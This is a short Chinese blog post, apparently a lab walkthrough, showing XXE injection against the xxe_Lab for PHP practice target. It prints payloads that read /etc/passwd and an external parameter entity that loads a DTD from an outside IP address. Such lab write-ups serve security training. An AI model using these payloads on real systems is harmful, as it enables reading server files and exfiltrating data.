跳至主要內容
XXE&SSRF

XXE

漏洞复现

XXE读文件

  1. 打开xxe_Lab for PHP的靶场,抓包。​​

  2. 判断是否有XXE注入漏洞

    1、判定是否使用了xml进行数据传递

    标签、Accept: application/xml, text/xml

    2、确定是否有回显位置,或无回显,下图有回显。​

  3. 写入payload。

    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY[
<!ENTITY a SYSTEM "file:///etc/passwd">
]>

    ​​

  4. 另一种情况是外部参数实体。

    <!ENTITY xxe SYSTEM "file:///etc/passwd">

  5. http服务

    <!ENTITY xxe SYSTEM "file:///etc/passwd">

    ​​

    <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY[
<!ENTITY % a SYSTEM "http://47.113.187.190:90/wai.dtd">
%a;
]>
<user><username>
&xxe;
</username><password>222</password></user>

  6. ​​

卷卷原创2023年3月28日大约 5 分钟渗透测试渗透测试XXE&SSRF
时间就像海绵里的水,挤一挤总会有的!
Copyright © 2023-present Juan